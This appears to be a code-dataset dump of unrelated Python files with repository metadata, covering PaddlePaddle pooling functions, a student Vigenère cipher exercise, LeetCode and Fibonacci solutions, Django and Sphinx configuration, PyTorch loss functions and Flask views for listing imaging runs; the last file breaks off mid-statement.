_check_input(x, 3)
pool_size = [1] + utils.convert_to_list(output_size, 1, 'pool_size')
x = unsqueeze(x, [2])
if in_dynamic_mode():
pool_out = _C_ops.max_pool2d_with_index(x, 'pooling_type', pool_type,
'ksize', pool_size, 'adaptive',
True)
return (squeeze(pool_out[0], [2]), squeeze(
pool_out[1], [2])) if return_mask else squeeze(pool_out[0], [2])
l_type = 'max_pool2d_with_index'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (squeeze(pool_out, [2]),
squeeze(mask, [2])) if return_mask else squeeze(pool_out, [2])
def adaptive_max_pool2d(x, output_size, return_mask=False, name=None):
"""
This operation applies a 2D adaptive max pooling on input tensor.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool2d` .
Args:
x (Tensor): The input tensor of adaptive max pool2d operator, which is a 4-D tensor. The data type can be float16, float32, float64, int32 or int64.
        output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain two elements, (H, W). H and W can be either an int, or None which means the size will be the same as that of the input.
return_mask (bool): If true, the index of max pooling point will be returned along with outputs. Default False.
name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default.
Returns:
Tensor: The output tensor of adaptive max pool2d result. The data type is same as input tensor.
Examples:
.. code-block:: python
# max adaptive pool2d
# suppose input data in the shape of [N, C, H, W], `output_size` is [m, n]
            # output shape is [N, C, m, n], adaptive pool divides H and W dimensions
            # of input data into m*n grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive max pool performs calculations as follows:
            #
            # for i in range(m):
            #     for j in range(n):
            #         hstart = floor(i * H / m)
            #         hend = ceil((i + 1) * H / m)
            #         wstart = floor(j * W / n)
            #         wend = ceil((j + 1) * W / n)
# output[:, :, i, j] = max(input[:, :, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 32, 32]
out = paddle.nn.functional.adaptive_max_pool2d(
x = x,
output_size=[3, 3])
# out.shape is [2, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool2d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool2d')
#check_type(output_size, 'pool_size', (int), 'adaptive_max_pool2d')
_check_input(x, 4)
in_h, in_w = x.shape[2:4]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_h
if output_size[1] == None:
output_size[1] = in_w
if in_dynamic_mode():
pool_out = _C_ops.max_pool2d_with_index(x, 'pooling_type', 'max',
'ksize', output_size,
'adaptive', True)
return pool_out if return_mask else pool_out[0]
l_type = 'max_pool2d_with_index'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": output_size,
"adaptive": True,
})
    return (pool_out, mask) if return_mask else pool_out
def adaptive_max_pool3d(x, output_size, return_mask=False, name=None):
"""
This operation applies a 3D adaptive max pooling on input tensor.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool3d` .
Args:
x (Tensor): The input tensor of adaptive max pool3d operator, which is a 5-D tensor. The data type can be float32, float64.
        output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain three elements, (D, H, W). D, H and W can be either an int, or None which means the size will be the same as that of the input.
return_mask (bool): If true, the index of max pooling point will be returned along with outputs. Default False.
name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default.
Returns:
Tensor: The output tensor of adaptive max pool3d result. The data type is same as input tensor.
Examples:
.. code-block:: python
# adaptive max pool3d
# suppose input data in the shape of [N, C, D, H, W], `output_size` is [l, m, n]
            # output shape is [N, C, l, m, n], adaptive pool divides D, H and W dimensions
            # of input data into l*m*n grids evenly and performs pooling in each
            # grid to get the output.
            # adaptive max pool performs calculations as follows:
            #
            # for i in range(l):
            #     for j in range(m):
            #         for k in range(n):
            #             dstart = floor(i * D / l)
            #             dend = ceil((i + 1) * D / l)
            #             hstart = floor(j * H / m)
            #             hend = ceil((j + 1) * H / m)
            #             wstart = floor(k * W / n)
            #             wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] = max(input[:, :, dstart: dend, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 8, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 8, 32, 32]
out = paddle.nn.functional.adaptive_max_pool3d(
x = x,
output_size=[3, 3, 3])
# out.shape is [2, 3, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool3d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool3d')
#check_type(output_size, 'pool_size', (int), 'adaptive_max_pool3d')
_check_input(x, 5)
in_l, in_h, in_w = x.shape[2:5]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_l
if output_size[1] == None:
output_size[1] = in_h
if output_size[2] == None:
output_size[2] = in_w
if in_dynamic_mode():
pool_out = _C_ops.max_pool3d_with_index(x, 'pooling_type', 'max',
'ksize', output_size,
'adaptive', True)
return pool_out if return_mask else pool_out[0]
l_type = 'max_pool3d_with_index'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": output_size,
"adaptive": True,
})
return (pool_out, mask) if return_mask else pool_out
|
[
"noreply@github.com"
] |
jiangjiajun.noreply@github.com
|
bf5915516e79b38b93c7a269ba95623d23fd8446
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/StudentProblem/10.21.11.40/4/1569574682.py
|
2a8bdc9fdab5515c21c04740702065a86d270197
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import functools
import typing
import string
import random
import pytest
## Solution, parts 1 and 2
class Vigenere:
def __init__(self, key: str):
"""
Create object with a secret key.
"""
assert key
self.key = key
def encrypt(self, w: str) -> str:
"""
        Encrypt the given text with the secret key of the object.
        The text and key are assumed to consist of uppercase letters A-Z.
"""
new_key = self.key * (len(w) // len(self.key) + 1)
msg = ""
for i, c in enumerate(w):
new_c = chr(ord(c) + (ord(new_key[i]) - ord('A')))
if ord(new_c) > ord('Z'):
new_c = chr(ord(new_c) - 26)
msg += new_c
return msg
def decrypt(self, w: str) -> str:
"""
        Decrypt the given text with the secret key of the object.
        The text and key are assumed to consist of uppercase letters A-Z.
"""
new_key = self.key * (len(w) // len(self.key) + 1)
msg = ""
for i, c in enumerate(w):
new_c = chr(ord(c) - (ord(new_key[i]) - ord('A')))
if ord(new_c) < ord('A'):
new_c = chr(ord(new_c) + 26)
msg += new_c
return msg
######################################################################
## Solution, part 3 (tests)
def test_vigenere():
v1 = Vigenere("MYSECRETKEY")
assert v1.decrypt(v1.encrypt("TESTFOOBAR")) == "TESTFOOBAR"
v2 = Vigenere("AAA")
assert v2.encrypt("BBB") == "BBB"
assert Vigenere("ABCD").encrypt("DCBA") == "DEFG"
######################################################################
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
4015633612642f4401bc86f7774e1ad5288cfac1
|
a599b24b934e75336913e448e05042757316c47b
|
/1019.NextGreaterNodeInLinkedList.py
|
d8a48d3aedf89f07b7699f6b5ae3292306582712
|
[] |
no_license
|
yilunchen27/leetcode-google-python
|
2e8f479c3ed63d77e6fb32d146adf51a294ceebc
|
e665b2a9db381bcd97e5fbaaaa566f11c3a8be32
|
refs/heads/master
| 2022-02-14T17:00:02.131783
| 2019-09-02T08:49:05
| 2019-09-02T08:49:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,368
|
py
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
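# Approach (solution 1): scan the list once while keeping a stack of (index, value) pairs
# whose values are strictly decreasing; each incoming node pops and resolves every smaller
# value still waiting on the stack.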
class Solution:
@staticmethod
def get_length(head: ListNode) -> int:
node = head
cnt = 0
while node is not None:
node = node.next
cnt += 1
return cnt
def nextLargerNodes(self, head: ListNode) -> List[int]:
n = Solution.get_length(head)
stack = list()
res = [0] * n
node = head
index = 0
for i in range(n):
while stack and node.val > stack[-1][1]:
res[stack.pop()[0]] = node.val
stack.append((index, node.val))
index += 1
node = node.next
return res
# Solution 2: No need of find length first.
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
# class Solution:
# def nextLargerNodes(self, head: ListNode) -> List[int]:
# stack = list()
# res = list()
# node = head
# while node:
# while stack and node.val > stack[-1][1]:
# res[stack.pop()[0]] = node.val
# stack.append((len(res), node.val))
# res.append(0)
# node = node.next
# return res
|
[
"huangruihaocst@126.com"
] |
huangruihaocst@126.com
|
734d5b3d90fd5a1bd6b690cd8ecd5522c9518feb
|
4a3e6789ebbe88c95c76b15f2b1ddc77d68a8545
|
/admin.py
|
589b8a479b367527c49fd9c59e2c6de0d73470bc
|
[] |
no_license
|
macrman/tickets
|
d48f916aa1e8f3e78a04dc8eb925ebf2bd7ffaed
|
d53be7788a9862e574b40b9c0768eea3aa229244
|
refs/heads/master
| 2016-09-02T01:02:00.200478
| 2012-05-10T21:35:11
| 2012-05-10T21:35:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
from tickets.models import ticket
from django.contrib import admin
admin.site.register(ticket)
|
[
"binarymac@gmail.com"
] |
binarymac@gmail.com
|
a87256f1ecd75f07e0e2d5006696dde6af08488c
|
8c0f9efbc962d04a453422119a896e31fcdc009e
|
/07.string/ljustTest.py
|
d31d369d1f185f0d979d7d6901c34fee85817423
|
[] |
no_license
|
unclebae/Python3-tutorial
|
4adf927c5a9373c83689ba9cf9a307d06d950a62
|
4bfe31013533b50804110aa90e3e25635b3b7cf9
|
refs/heads/master
| 2021-01-18T18:33:16.757433
| 2016-07-23T18:09:57
| 2016-07-23T18:09:57
| 64,009,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
str = "this is string example....wow!!!"
print (str.ljust(50, '*'))
|
[
"kido@coupang.com"
] |
kido@coupang.com
|
6bfc80d810a67dbe8a8a6216a966d341b0e2ac28
|
ccd8aec1c3b00a62946f55a3c4b6458fca295528
|
/starterbot/bin/pip3
|
f58ce69b13ee993556221ca1ad77fcaba3247e74
|
[] |
no_license
|
tpriyanshu90/motiBot
|
e53cffc01e0316e42561b64de81ce268490e49d0
|
37d2fca2fc91fde15630b93de089ae9e0485e1d4
|
refs/heads/master
| 2020-04-04T10:12:49.240135
| 2018-11-05T16:34:03
| 2018-11-05T16:34:03
| 155,846,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
#!/home/tpriyanshu/Desktop/pythonBot/motiBot/starterbot/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"tpriyanshu90@gmail.com"
] |
tpriyanshu90@gmail.com
|
|
1fbf6a0ceed592bce3279768df724fa06ec3a90a
|
e00df1e9b3b501a548518034c8adf5a32aab4607
|
/quiz/models.py
|
1a8aa559bda3b9c5aa74c0083fdbbc5132675d2e
|
[] |
no_license
|
imajaydwivedi/SQLDBAToolsInventory
|
f83e6f3e3d0c6a02c85ede22251b6efec64084f9
|
3df150732d283b082cc81888631003cd8917dea9
|
refs/heads/master
| 2020-04-10T04:03:28.261925
| 2019-01-07T07:26:40
| 2019-01-07T07:26:40
| 160,786,851
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,148
|
py
|
from django.db import models
# Create your models here.
class Questiontechnology(models.Model):
technologyid = models.AutoField(primary_key=True)
CATEGORY_CHOICES = (
('MSSQL', 'SQL Server'),
('MySQL', 'MySQL'),
('Oracle', 'Oracle'),
)
category = models.CharField(
max_length=20, blank=True, null=True, choices=CATEGORY_CHOICES, default='MSSQL')
SUBCATEGORY_CHOICES = (
('DEV', 'Development'),
('Admin', 'Administration'),
('Art', 'Architect'),
)
subcategory = models.CharField(max_length=20, blank=True, null=True, choices = SUBCATEGORY_CHOICES, default = 'Admin')
LEVEL_CHOICES = (
('L1','Level 01 - Beginner'),
('L2','Level 02 - Intermediate'),
('L3','Level 03 - Expert'),
('L4','Level 04 - SME'),
)
# level = models.IntegerField(blank=True, null=True)
level = models.CharField(max_length=8, blank=True, null=True, choices = LEVEL_CHOICES, default = 'L2')
description = models.CharField(max_length=255, blank=True, null=True)
class Meta:
managed = False
db_table = 'QuestionTechnology'
|
[
"ajay.dwivedi2007@gmail.com"
] |
ajay.dwivedi2007@gmail.com
|
f3f49a15573cd234eda38635a963deb65a4e5fa6
|
f57b8ea2a5b955a587488069b6b0f8bd180ff32d
|
/docs/source/conf.py
|
3650576aefbf7fcb81bdbfde0cc13d15760efab4
|
[
"NCSA",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
UIUCLibrary/HT_checksum_update
|
002416e9b435c8e4c242e2f2a425dca773553137
|
facee4de7f982746913f2b1b68a91395b5107e1a
|
refs/heads/master
| 2021-07-13T23:44:04.466191
| 2021-03-30T18:39:44
| 2021-03-30T18:39:44
| 97,273,018
| 0
| 0
|
NOASSERTION
| 2021-03-30T18:34:58
| 2017-07-14T21:11:15
|
Python
|
UTF-8
|
Python
| false
| false
| 6,048
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# hathiChecksumUpdate documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 17 14:52:11 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
import hathi_checksum
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.githubpages',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = hathi_checksum.FULL_TITLE
copyright = '2017, {}'.format(hathi_checksum.__author__)
author = hathi_checksum.__author__
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = hathi_checksum.__version__
# The full version, including alpha/beta/rc tags.
release = hathi_checksum.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# 'logo': 'full_mark_horz_bw.png',
'github_user': 'uiuclibrary',
'github_repo': 'HT_checksum_update',
'github_button': True,
'logo_name': True,
'description': hathi_checksum.__description__
}
# html_use_smartypants = True
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'hathiChecksumUpdatedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'hathiChecksumUpdate.tex', 'hathiChecksumUpdate Documentation',
'h', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hathichecksumupdate', 'hathiChecksumUpdate Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'hathiChecksumUpdate', 'hathiChecksumUpdate Documentation',
author, 'hathiChecksumUpdate', 'One line description of project.',
'Miscellaneous'),
]
|
[
"hborcher@illinois.edu"
] |
hborcher@illinois.edu
|
e244ccda4d34da7aec1bbbfa2d7f4040f2834f76
|
fd44e1d649cdd97dddfce18004bbe68042d13700
|
/resources/lib/basictypes/wx/font.py
|
f7ec03aa1e272cb0fd46792b48853f0b95a82a37
|
[
"MIT"
] |
permissive
|
Flaykz/Transmission-KODI
|
97e0652dff95eca15c6479a24d56cb52aae73a52
|
3b32d7a8d2685be9b958f4544c3b42b2baf4c705
|
refs/heads/master
| 2020-12-03T09:12:40.944762
| 2019-05-24T05:36:08
| 2019-05-24T05:36:08
| 49,025,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
"""Data-type definition for wxPython font class"""
from wxPython.wx import *
from basictypes import datatypedefinition, registry
##from basictypes.wx import wxcopyreg
__all__ = ( "wxFont_DT", )
class wxFont_DT( datatypedefinition.BaseType_DT ):
"""Data-type definition for wxPython font class"""
dataType = "wx.font"
baseType = wxFontPtr
registry.registerDT( wxFontPtr, wxFont_DT)
registry.registerDT( wxFont, wxFont_DT)
|
[
"david.brouste.perso@gmail.com"
] |
david.brouste.perso@gmail.com
|
81cacfcc4c95a515be546b246ef49adaab293c91
|
94c8f0b09ced7ae86fba0d09faf4310e508c18e5
|
/scaler/dp2/dp1/ath_fibonacci_number.py
|
d681bacdc08f7d1b0bd4b977577937b4c9e089ee
|
[] |
no_license
|
navkant/ds_algo_practice
|
6e7dd427df6ac403ac23fa68b079b162b839447a
|
a2b762d08b151f6dbbc12d76dd930f6cd7b9017d
|
refs/heads/master
| 2023-06-24T02:56:25.886991
| 2021-06-13T03:42:24
| 2021-06-13T03:42:24
| 376,431,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 936
|
py
|
class Solution:
    def __init__(self):
        self.ath_term = 0
    def ath_fibonacci_recursive(self, first, second, A, position):
        # Carry the last two terms forward until position A is reached.
        if A <= 1:
            self.ath_term = A
            return
        if position == A:
            self.ath_term = second
            return
        self.ath_fibonacci_recursive(second, second + first, A, position + 1)
    def ath_fibonacci_iterative(self, A):
        # Iterative variant: roll (first, second) forward from position 2 to A.
        if A <= 1:
            return A
        first = 0
        second = 1
        for i in range(2, A + 1):
            temp = first
            first = second
            second = temp + second
        return second
    def solve(self, A):
        f = 0
        s = 1
        self.ath_fibonacci_recursive(f, s, A, 1)
        print(f'recursive ans is {self.ath_term}')
        ans = self.ath_fibonacci_iterative(A)
        print(f'iterative ans is {ans}')
if __name__ == '__main__':
a = 6
obj = Solution()
obj.solve(a)
|
[
"navkanttyagi@MacBook-Air.local"
] |
navkanttyagi@MacBook-Air.local
|
8258ae3f393ff2d10aff6c0cca258bf813913879
|
36931f23be2afadaee6a047bb3e86309f64b5e99
|
/Losses/losses.py
|
0339a164303ef648d1d72b45537bd41bc35628ed
|
[] |
no_license
|
cvlab-stonybrook/S2N_Release
|
13cf4df6b2c8ef65bdbf6163266eb5c55080ebe9
|
bc32142d059add14d550c8980adf3672485d4a98
|
refs/heads/master
| 2022-06-26T23:46:40.490222
| 2018-12-25T13:41:02
| 2018-12-25T13:41:02
| 235,153,446
| 0
| 0
| null | 2022-06-22T00:52:01
| 2020-01-20T17:06:09
|
Python
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
import torch
import torch.nn.functional as F
from torch.autograd import Variable
def EMD_L2(predictions, targets, needSoftMax=True):
#TODO: checked run but not checked correctness!
if needSoftMax:
predictions = F.softmax(predictions, dim=1)
predictions = torch.cumsum(predictions, dim=1)
targets = torch.cumsum(targets, dim=1)
lossvalue = torch.norm(predictions - targets, p=2).mean()
return lossvalue
# elm_loss = (predictions - targets)**2
# batch_size = predictions.size(0)
# return torch.sum(elm_loss)/batch_size
def Simple_L2(predictions, targets, needSoftMax=True):
#TODO: checked run but not checked correctness!
if needSoftMax:
predictions = F.softmax(predictions, dim=1)
# predictions = torch.cumsum(predictions, dim=1)
# targets = torch.cumsum(targets, dim=1)
lossvalue = torch.norm(predictions - targets, p=2).mean()
return lossvalue
def to_one_hot(y, n_dims=None, useCuda=True):
""" Take integer y (tensor or variable) with n dims and convert it to 1-hot representation with n+1 dims. """
y_tensor = y.data if isinstance(y, Variable) else y
y_tensor = y_tensor.type(torch.LongTensor).view(-1, 1)
n_dims = n_dims if n_dims is not None else int(torch.max(y_tensor)) + 1
y_one_hot = torch.zeros(y_tensor.size()[0], n_dims).scatter_(1, y_tensor, 1)
if useCuda:
y_one_hot=y_one_hot.cuda()
y_shape = [i for i in y.shape]
y_shape.append(-1)
y_one_hot = y_one_hot.view(*y_shape)
return Variable(y_one_hot, requires_grad=False) if isinstance(y, Variable) else y_one_hot
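# Illustrative check (added note, not part of the original file):
#   to_one_hot(torch.tensor([0, 2, 1]), n_dims=3, useCuda=False)
# returns tensor([[1., 0., 0.],
#                 [0., 0., 1.],
#                 [0., 1., 0.]])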
def WeightedMSE(predictions, targets, weights):
#TODO: check if there are error heres
return torch.dot(weights.view_as(predictions), (predictions - targets) ** 2)
def MSEloss(predictions, targets):
return torch.sum((predictions - targets.view_as(targets))**2)
def ClsLocLoss(predictions, targets, overlaps):
# adapted from Shou CVPR2016
# caffe version defined in
# https://github.com/zhengshou/scnn/blob/master/C3D-v1.0/C3D_overlap_loss/src/caffe/layers/softmax_loss_layer.cpp
# loss_overlap += 0.5 * (prob_data[i * dim + static_cast < int > (label[i])] / static_cast < float > (std
# ::sqrt(std::sqrt(std::sqrt(overlap[i])))))*(
# prob_data[i * dim + static_cast < int > (label[i])] / static_cast < float > (std
# ::sqrt(std::sqrt(std::sqrt(overlap[i]))))) - 0.5;
target_weights = (targets!=0).float()
loss = (predictions**2/ overlaps.pow(0.25) - targets**2)
loss = torch.sum(loss * target_weights)
return loss
def ClsLocLoss2_OneClsRegression(predictions, targets, overlaps):
# following the previous loss, but modified for our use case
# overlap with ground truth is 0, we set overlap to 1 to avoid divison with 0, but weight them 0
# target_weights = (overlaps!=0).float()
loss = (predictions / overlaps - targets.float())**2
loss = torch.sum(loss)
return loss
def ClsLocLoss2_OneClsRegression_v2(predictions, overlaps):
# following the previous loss, but modified for our use case
# overlap with ground truth is 0, we set overlap to 1 to avoid divison with 0, but weight them 0
# target_weights = (overlaps!=0).float()
loss = (predictions - overlaps)**2
loss = torch.sum(loss)
return loss
def ClsLocLoss_MultiClass(predictions, targets, overlaps, useSoftMax=True):
if useSoftMax:
predictions = F.softmax(predictions, dim=1)
overlaps = overlaps.view_as(targets)
target_weights = (overlaps!=0).float()
overlaps[overlaps==0]=1
loss = (predictions.gather(dim=1, index=targets.long())/(overlaps.pow(0.125)) - 1)**2
loss = torch.sum(loss * target_weights)
return loss
def ClsLocLoss_Regression(predictions, targets, overlaps, thres=0.7, useSoftMax=True):
overlaps = overlaps.view_as(targets)
targets[overlaps<thres]=0
target_weights = (overlaps!=0).float()
overlaps[overlaps==0]=1
loss = (predictions/(overlaps.pow(0.125)) - targets)**2
loss = torch.sum(loss * target_weights)
return loss
if __name__ == '__main__':
import numpy as np
from torch.autograd import Variable
predictions = torch.rand(2,5)
targets = torch.zeros(*predictions.size())
targets[0,1] = 1
targets[1,2] = 1
predictions = Variable(predictions, requires_grad=True)
targets = Variable(targets, requires_grad=False)
loss = EMD_L2(predictions, targets, needSoftMax=True)
loss.backward()
print "DB"
|
[
"zijwei@cs.stonybrook.edu"
] |
zijwei@cs.stonybrook.edu
|
cfcede48184a481953cd48b7e63e96ad844a9104
|
29dfcadf661148c35bc3a8d292e2a61d5c8a74d0
|
/application/views/runs.py
|
dd7dfed3af86c360ee639ac81e1483ef2b54e2d8
|
[
"MIT"
] |
permissive
|
AstroChem/MAPServer
|
4fa416e4f0c66e9d1d1471282eec2415cf69b272
|
3ea8209d5d106c8799216ae2405ba1c396477eec
|
refs/heads/master
| 2022-08-09T01:11:38.323804
| 2020-05-16T20:43:55
| 2020-05-16T20:43:55
| 249,030,766
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,882
|
py
|
from flask import (
render_template,
session,
redirect,
url_for,
current_app,
g,
send_from_directory,
)
import os
import pandas as pd
import numpy as np
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
from bokeh.embed import components
from bokeh.palettes import Dark2_5 as palette
import itertools
from sqlalchemy import select, join, and_, func, literal, desc, asc
from mapsdb import schema
from flask import Blueprint
from application.db import get_db
from application.views.auth import login_required
bp = Blueprint("runs", __name__)
@bp.route("/runs/")
def runs():
"""
Show all runs
"""
db = get_db()
with db.begin():
# create a giant join to get all the important run properties
j = (
schema.runs.join(schema.run_statuses)
.join(schema.measurement_sets)
.join(schema.disks)
.join(schema.transitions)
.join(schema.method_implementations)
.join(schema.method_types)
)
s = (
select(
[
schema.runs,
schema.run_statuses.c.run_status,
schema.method_implementations,
schema.method_types.c.method_type,
schema.disks.c.disk_name,
schema.transitions.c.transition_id,
schema.transitions.c.molecule_name,
schema.transitions.c.quantum_number,
]
)
.reduce_columns()
.select_from(j)
)
result = db.execute(s)
runs_list = result.fetchall()
return render_template("runs/runs.html", runs_list=runs_list)
@bp.route("/runs/<int:run_id>/")
def run(run_id):
"""
Show the run summary corresponding to the run_id.
"""
# get the loss.csv fname from the run_id
db = get_db()
with db.begin():
s = select([schema.runs.c.output_dir]).where(schema.runs.c.run_id == run_id)
result = db.execute(s)
rel_output_dir = result.first()[0]
# load the file and use bokeh to make a figure of loss rates
fname = os.path.join(current_app.config["MAPS_ROOT"], rel_output_dir, "losses.csv")
if os.path.exists(fname):
df = pd.read_csv(fname)
# drop the columns that are nan
df = df.dropna(axis=1)
source = ColumnDataSource(df)
colors = itertools.cycle(palette)
p = figure(title="Losses", x_axis_label="Iteration", y_axis_label="Loss")
for key in [
"tot",
"nll",
"entropy",
"sparsity",
"TV_image",
"TV_channel",
"UV_sparsity",
]:
if key in df.columns:
p.line(
x="index",
y=key,
source=source,
line_width=2,
legend_label=key,
color=next(colors),
)
bokeh_script, bokeh_plot_div = components(p)
else:
bokeh_script = None
bokeh_plot_div = None
# get the disk_parameters
db = get_db()
with db.begin():
s = select([schema.cube_types])
result = db.execute(s)
cube_types = result.fetchall()
# create a join with runs, disk_id, etc.
j = (
schema.runs.join(schema.measurement_sets)
.join(schema.disks)
.join(schema.transitions)
)
s = (
select(
[schema.runs, schema.disks, schema.measurement_sets, schema.transitions]
)
.where(schema.runs.c.run_id == run_id)
.select_from(j)
).reduce_columns()
result = db.execute(s)
combo_params = result.first()
j = schema.runs.join(schema.parameters)
s = (
select([schema.parameters])
.select_from(j)
.where(schema.runs.c.run_id == run_id)
)
run_parameters = db.execute(s).first()
# assemble run statistics
s = select(
[
